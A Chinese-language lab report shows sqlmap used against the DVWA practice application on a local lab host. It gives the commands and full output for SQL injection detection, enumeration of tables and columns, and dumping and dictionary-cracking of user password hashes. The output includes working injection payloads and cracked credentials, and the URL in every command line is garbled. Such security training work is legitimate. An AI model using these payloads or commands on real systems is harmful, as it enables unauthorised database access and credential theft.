web渗透测试实战-SQLMAP

一、实验项目名称

web渗透测试实战-SQLMAP

二、实验目的及要求

熟悉SQL注入漏洞原理

熟悉SQLMAP工具使用。

1、获取数据库信息：数据库漏洞、数据库名、数据库版本等

python sqlmap.py -u "--cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" --current-db

E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338>python sqlmap.py -u "--cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" --current-dbE:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\sqlmap.py:21: DeprecationWarning: The distutils package is deprecated and slated for removal in Python 3.12. Use setuptools or check PEP 632 for potential alternatives import distutils ___ __H__ ___ ___["]_____ ___ ___ {1.5.6.2#dev}|_ -| . [,] | .'| . ||___|_ [(]_|_|_|__,| _| |_|V... |_| legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 09:26:19 /2022-05-26/[09:26:20] [INFO] testing connection to the target URL[09:26:20] [INFO] checking if the target is protected by some kind of WAF/IPS[09:26:20] [INFO] testing if the target URL content is stable[09:26:20] [INFO] target URL content is stable[09:26:20] [INFO] testing if GET parameter 'id' is dynamic[09:26:20] [WARNING] GET parameter 'id' does not appear to be dynamic[09:26:20] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')[09:26:20] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks[09:26:20] [INFO] testing for SQL injection on GET parameter 'id'it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] yfor the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y[09:26:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[09:26:28] [WARNING] reflective value(s) found and filtering out[09:26:28] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'[09:26:28] [INFO] testing 'Generic inline queries'[09:26:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'[09:26:29] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'[09:26:29] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'[09:26:29] [INFO] GET parameter 'id' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable (with --not-string="Me")[09:26:29] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'[09:26:29] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'[09:26:29] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'[09:26:30] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'[09:26:30] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'[09:26:30] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'[09:26:30] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'[09:26:30] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'[09:26:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'[09:26:30] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable[09:26:30] [INFO] testing 'MySQL inline queries'[09:26:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'[09:26:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries'[09:26:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'[09:26:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'[09:26:30] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'[09:26:30] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'[09:26:30] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'[09:26:40] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable[09:26:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'[09:26:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'[09:26:40] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found[09:26:40] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test[09:26:40] [INFO] target URL appears to have 2 columns in query[09:26:40] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable[09:26:40] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrievalGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y[09:26:43] [INFO] testing if GET parameter 'Submit' is dynamic[09:26:43] [WARNING] GET parameter 'Submit' does not appear to be dynamic[09:26:43] [WARNING] heuristic (basic) test shows that GET parameter 'Submit' might not be injectable[09:26:43] [INFO] testing for SQL injection on GET parameter 'Submit'[09:26:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[09:26:43] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'[09:26:43] [INFO] testing 'Generic inline queries'[09:26:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'[09:26:44] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'[09:26:44] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'[09:26:45] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'[09:26:46] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'[09:26:47] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'[09:26:47] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'[09:26:49] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'[09:26:49] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'[09:26:50] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'[09:26:51] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'[09:26:51] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'[09:26:51] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'[09:26:51] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'[09:26:51] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'[09:26:52] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'[09:26:52] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'[09:26:53] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'[09:26:53] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'[09:26:54] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'[09:26:55] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'[09:26:56] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'[09:26:56] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'[09:26:57] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'[09:26:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'[09:26:59] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'[09:26:59] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'[09:27:00] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'[09:27:01] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'[09:27:02] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'[09:27:02] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'[09:27:03] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'[09:27:04] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'[09:27:04] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'[09:27:05] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'[09:27:05] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'[09:27:05] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'[09:27:05] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'[09:27:05] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'[09:27:05] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'[09:27:05] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'[09:27:05] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'[09:27:05] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'[09:27:05] [INFO] testing 'MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)'[09:27:05] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'[09:27:05] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'[09:27:05] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'[09:27:05] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'[09:27:05] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'[09:27:05] [INFO] testing 'MySQL inline queries'[09:27:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'[09:27:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries'[09:27:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'[09:27:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'[09:27:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'[09:27:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'[09:27:08] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'[09:27:08] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'[09:27:09] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'[09:27:10] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'[09:27:11] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'[09:27:11] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'[09:27:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'[09:27:12] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'[09:27:12] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'[09:27:13] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'[09:27:14] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'[09:27:14] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query - comment)'[09:27:15] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'[09:27:16] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'[09:27:16] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'[09:27:17] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'[09:27:17] [INFO] testing 'MySQL AND time-based blind (ELT)'[09:27:18] [INFO] testing 'MySQL OR time-based blind (ELT)'[09:27:19] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'[09:27:19] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'[09:27:19] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'[09:27:20] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'[09:27:20] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'[09:27:20] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'[09:27:20] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (heavy queries)'[09:27:20] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'[09:27:20] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'[09:27:20] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'[09:27:20] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'[09:27:20] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (heavy query)'it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y[09:27:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'[09:27:32] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'[09:27:39] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'[09:27:44] [WARNING] GET parameter 'Submit' does not seem to be injectablesqlmap identified the following injection point(s) with a total of 3725 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment) Payload: id=1' OR NOT 1427=1427#&Submit=Submit Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=1' AND (SELECT 8864 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(8864=8864,1))),0x71787a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OXhb&Submit=Submit Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1' AND (SELECT 5848 FROM (SELECT(SLEEP(5)))ydqX)-- iPyQ&Submit=Submit Type: UNION query Title: MySQL UNION query (NULL) - 2 columns Payload: id=1' UNION ALL SELECT CONCAT(0x717a6a7671,0x586b797a44794f5550596575724a4e444d4377616c446b5a7465737a524e68664a6464534d625251,0x71787a7071),NULL#&Submit=Submit---[09:27:44] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: PHP 5.4.45, Apache 2.4.23back-end DBMS: MySQL >= 5.0[09:27:44] [INFO] fetching current databasecurrent database: 'dvwa'[09:27:44] [INFO] fetched data logged to text files under 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149'[09:27:44] [WARNING] your sqlmap version is outdated[*] ending @ 09:27:44 /2022-05-26/

2、获取数据库表名

python sqlmap.py -u "--cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -D "dvwa" --tables

E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338>python sqlmap.py -u "--cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -D "dvwa" --tablesE:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\sqlmap.py:21: DeprecationWarning: The distutils package is deprecated and slated for removal in Python 3.12. Use setuptools or check PEP 632 for potential alternatives import distutils ___ __H__ ___ ___[.]_____ ___ ___ {1.5.6.2#dev}|_ -| . [)] | .'| . ||___|_ [)]_|_|_|__,| _| |_|V... |_| legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 09:32:48 /2022-05-26/[09:32:48] [INFO] resuming back-end DBMS 'mysql'[09:32:48] [INFO] testing connection to the target URLsqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment) Payload: id=1' OR NOT 1427=1427#&Submit=Submit Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=1' AND (SELECT 8864 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(8864=8864,1))),0x71787a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OXhb&Submit=Submit Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1' AND (SELECT 5848 FROM (SELECT(SLEEP(5)))ydqX)-- iPyQ&Submit=Submit Type: UNION query Title: MySQL UNION query (NULL) - 2 columns Payload: id=1' UNION ALL SELECT CONCAT(0x717a6a7671,0x586b797a44794f5550596575724a4e444d4377616c446b5a7465737a524e68664a6464534d625251,0x71787a7071),NULL#&Submit=Submit---[09:32:48] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: PHP 5.4.45, Apache 2.4.23back-end DBMS: MySQL >= 5.0[09:32:48] [INFO] fetching tables for database: 'dvwa'[09:32:48] [WARNING] reflective value(s) found and filtering outDatabase: dvwa[2 tables]+-----------+| guestbook || users |+-----------+[09:32:48] [INFO] fetched data logged to text files under 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149'[09:32:48] [WARNING] your sqlmap version is outdated[*] ending @ 09:32:48 /2022-05-26/

3、获取数据库指定表的字段

python sqlmap.py -u "--cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -T "users" --columns

E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338>python sqlmap.py -u "--cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -T "users" --columnsE:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\sqlmap.py:21: DeprecationWarning: The distutils package is deprecated and slated for removal in Python 3.12. Use setuptools or check PEP 632 for potential alternatives import distutils ___ __H__ ___ ___[,]_____ ___ ___ {1.5.6.2#dev}|_ -| . [,] | .'| . ||___|_ [)]_|_|_|__,| _| |_|V... |_| legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 09:34:06 /2022-05-26/[09:34:07] [INFO] resuming back-end DBMS 'mysql'[09:34:07] [INFO] testing connection to the target URLsqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment) Payload: id=1' OR NOT 1427=1427#&Submit=Submit Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=1' AND (SELECT 8864 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(8864=8864,1))),0x71787a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OXhb&Submit=Submit Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1' AND (SELECT 5848 FROM (SELECT(SLEEP(5)))ydqX)-- iPyQ&Submit=Submit Type: UNION query Title: MySQL UNION query (NULL) - 2 columns Payload: id=1' UNION ALL SELECT CONCAT(0x717a6a7671,0x586b797a44794f5550596575724a4e444d4377616c446b5a7465737a524e68664a6464534d625251,0x71787a7071),NULL#&Submit=Submit---[09:34:07] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: PHP 5.4.45, Apache 2.4.23back-end DBMS: MySQL >= 5.0[09:34:07] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns[09:34:07] [INFO] fetching current database[09:34:07] [INFO] fetching columns for table 'users' in database 'dvwa'[09:34:07] [WARNING] reflective value(s) found and filtering outDatabase: dvwaTable: users[8 columns]+--------------+-------------+| Column | Type |+--------------+-------------+| user | varchar(15) || avatar | varchar(70) || failed_login | int(3) || first_name | varchar(15) || last_login | timestamp || last_name | varchar(15) || password | varchar(32) || user_id | int(6) |+--------------+-------------+[09:34:07] [INFO] fetched data logged to text files under 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149'[09:34:07] [WARNING] your sqlmap version is outdated[*] ending @ 09:34:07 /2022-05-26/

4、获取用户名和密码（字段直接逗号隔开）

python sqlmap.py -u "--cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -T "users" -C "user,password" --dump

E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338>python sqlmap.py -u "--cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -T "users" -C "user,password" --dumpE:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\sqlmap.py:21: DeprecationWarning: The distutils package is deprecated and slated for removal in Python 3.12. Use setuptools or check PEP 632 for potential alternatives import distutils ___ __H__ ___ ___[(]_____ ___ ___ {1.5.6.2#dev}|_ -| . [(] | .'| . ||___|_ [.]_|_|_|__,| _| |_|V... |_| legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 09:38:43 /2022-05-26/[09:38:43] [INFO] resuming back-end DBMS 'mysql'[09:38:43] [INFO] testing connection to the target URLsqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment) Payload: id=1' OR NOT 1427=1427#&Submit=Submit Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=1' AND (SELECT 8864 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(8864=8864,1))),0x71787a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OXhb&Submit=Submit Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1' AND (SELECT 5848 FROM (SELECT(SLEEP(5)))ydqX)-- iPyQ&Submit=Submit Type: UNION query Title: MySQL UNION query (NULL) - 2 columns Payload: id=1' UNION ALL SELECT CONCAT(0x717a6a7671,0x586b797a44794f5550596575724a4e444d4377616c446b5a7465737a524e68664a6464534d625251,0x71787a7071),NULL#&Submit=Submit---[09:38:43] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: Apache 2.4.23, PHP 5.4.45back-end DBMS: MySQL >= 5.0[09:38:43] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries[09:38:43] [INFO] fetching current database[09:38:43] [INFO] fetching entries of column(s) '`user`,password' for table 'users' in database 'dvwa'[09:38:43] [WARNING] reflective value(s) found and filtering out[09:38:43] [INFO] recognized possible password hashes in column 'password'do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y[09:38:46] [INFO] writing hashes to a temporary file 'C:\Users\98377\AppData\Local\Temp\sqlmap01aoz2p_29596\sqlmaphashes-7_sfrh7s.txt'do you want to crack them via a dictionary-based attack? [Y/n/q] y[09:38:53] [INFO] using hash method 'md5_generic_passwd'what dictionary do you want to use?[1] default dictionary file 'E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\data\txt\wordlist.tx_' (press Enter)[2] custom dictionary file[3] file with list of dictionary files> 1[09:39:05] [INFO] using default dictionarydo you want to use common password suffixes? (slow!) [y/N] y[09:39:08] [INFO] starting dictionary-based cracking (md5_generic_passwd)[09:39:08] [INFO] starting 16 processes[e99a18c428cb38d5f260853678922e0309:39:12' [INFO] cracked password 'abc123' for hash '[' for hash '09:39:148d3533d75ae2c3966d7e0d4fcc69216b] ['[' [09:39:17INFO] [] current status: odrik... /INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7[] [09:39:18INFO] [] cracked password 'INFOpassword] current status: rootp... |' for hash '5f4dcc3b5aa765d61d8327deb882cf99'[09:39:20] [INFO] using suffix '1'[09:39:30] [INFO] using suffix '123'[09:39:3409:39:34] [] [INFOINFO] current status: arym1... /] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'[09:39:40] [INFO] using suffix '2'[09:39:50] [INFO] using suffix '12'[09:40:00] [INFO] using suffix '3'[09:40:10] [INFO] using suffix '13'[09:40:20] [INFO] using suffix '7'[09:40:31] [INFO] using suffix '11'[09:40:41] [INFO] using suffix '5'[09:40:51] [INFO] using suffix '22'[09:41:02] [INFO] using suffix '23'[09:41:12] [INFO] using suffix '01'[09:41:22] [INFO] using suffix '4'[09:41:32] [INFO] using suffix '07'[09:41:42] [INFO] using suffix '21'[09:41:52] [INFO] using suffix '14'[09:42:03] [INFO] using suffix '10'[09:42:12] [INFO] using suffix '06'[09:42:22] [INFO] using suffix '08'[09:42:32] [INFO] using suffix '8'[09:42:43] [INFO] using suffix '15'[09:42:53] [INFO] using suffix '69'[09:43:02] [INFO] using suffix '16'[09:43:13] [INFO] using suffix '6'[09:43:23] [INFO] using suffix '18'[09:43:33] [INFO] using suffix '!'[09:43:43] [INFO] using suffix '.'[09:43:52] [INFO] using suffix '*'[09:44:03] [INFO] using suffix '!!'[09:44:12] [INFO] using suffix '?'[09:44:22] [INFO] using suffix ';'[09:44:32] [INFO] using suffix '..'[09:44:42] [INFO] using suffix '!!!'[09:45:02] [INFO] using suffix ', '[09:46:38] [INFO] using suffix '@'Database: dvwaTable: users[5 entries]+---------+---------------------------------------------+| user | password |+---------+---------------------------------------------+| admin | 5f4dcc3b5aa765d61d8327deb882cf99 (password) || gordonb | e99a18c428cb38d5f260853678922e03 (abc123) || 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) || pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) || smithy | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |+---------+---------------------------------------------+[09:46:49] [INFO] table 'dvwa.users' dumped to CSV file 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149\dump\dvwa\users.csv'[09:46:49] [INFO] fetched data logged to text files under 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149'[09:46:49] [WARNING] your sqlmap version is outdated[*] ending @ 09:46:49 /2022-05-26/

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。